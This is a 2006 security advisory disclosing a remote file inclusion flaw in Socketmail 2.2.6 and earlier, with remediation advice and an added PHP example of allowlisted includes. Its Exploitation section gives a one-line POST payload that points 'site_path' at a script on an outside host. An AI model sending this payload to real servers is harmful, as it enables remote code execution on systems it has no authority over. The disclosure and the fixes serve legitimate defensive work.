[MajorSecurity #6] Socketmail <= 2.2.6 - Remote File Include Vulnerability
--------------------------------------------------------
Software: Socketmail
Version: <=2.2.6
Type: Remote File Include Vulnerability
Date: May, 25th 2006
Vendor: Creative Digital Resources
Page: http://socketmail.com
Risk: High
Credits:
----------------------------
'Aesthetico'
http://www.majorsecurity.de
Affected Products:
----------------------------
Socketmail Lite 2.2.6 and prior
Socketmail Pro 2.2.6 and prior
Description:
----------------------------
SocketMail is a powerful, scalable and fully customisable e-mail solution.
Ideal messaging solution for web sites and enterprises of all sizes.
Requirements:
----------------------------
register_globals = On
magic_quotes = On
Vulnerability:
----------------------------
Input passed to the "site_path" parameter in "index.php" and "inc-common.php"
is not properly verified before it is used to include files.
This can be exploited to execute arbitrary code by including files from
external resources.
Solution:
----------------------------
Edit the source code to ensure that input is properly sanitised.
Set "register_globals" to "Off".
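One way to apply the first fix, as an added example (not Socketmail's code, which this advisory does not show): the include base is a constant taken from the script's own location, requests carrying a "site_path" field are refused, and includes are resolved through an allowlist. The function name load_component, the component names and the inc/ layout are hypothetical.

```php
<?php
// Added example; not Socketmail source. Names and file layout are assumptions.
// php.ini, as defence in depth: register_globals = Off (as recommended above)
// and allow_url_include = Off on PHP versions that support it.

// The base path comes from the filesystem, never from request data. A constant
// cannot be overwritten by register_globals the way $site_path can.
define('SITE_PATH', __DIR__);

// With register_globals = On, a request field named site_path would populate
// $site_path before the script body runs. Refuse such requests outright.
foreach (array($_GET, $_POST, $_COOKIE) as $source) {
    if (array_key_exists('site_path', $source)) {
        header('HTTP/1.1 400 Bad Request');
        exit('Bad request');
    }
}

// Hypothetical allowlist: logical component name -> file below SITE_PATH.
$components = array(
    'common' => 'inc/inc-common.php',
    'header' => 'inc/header.php',
);

function load_component($name, array $components)
{
    // Only names present in the allowlist can be included at all.
    if (!isset($components[$name])) {
        throw new InvalidArgumentException('Unknown component');
    }
    $full = realpath(SITE_PATH . '/' . $components[$name]);
    // realpath() returns false for missing files; the prefix check rejects
    // anything that resolves outside the application directory.
    if ($full === false
        || strpos($full, SITE_PATH . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('Include path rejected');
    }
    require_once $full;
}

// Usage: the caller passes a fixed component name, never a path or URL.
// load_component('common', $components);
```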
Exploitation:
----------------------------
Post data:
site_path=http://www.yourspace.com/yourscript.php?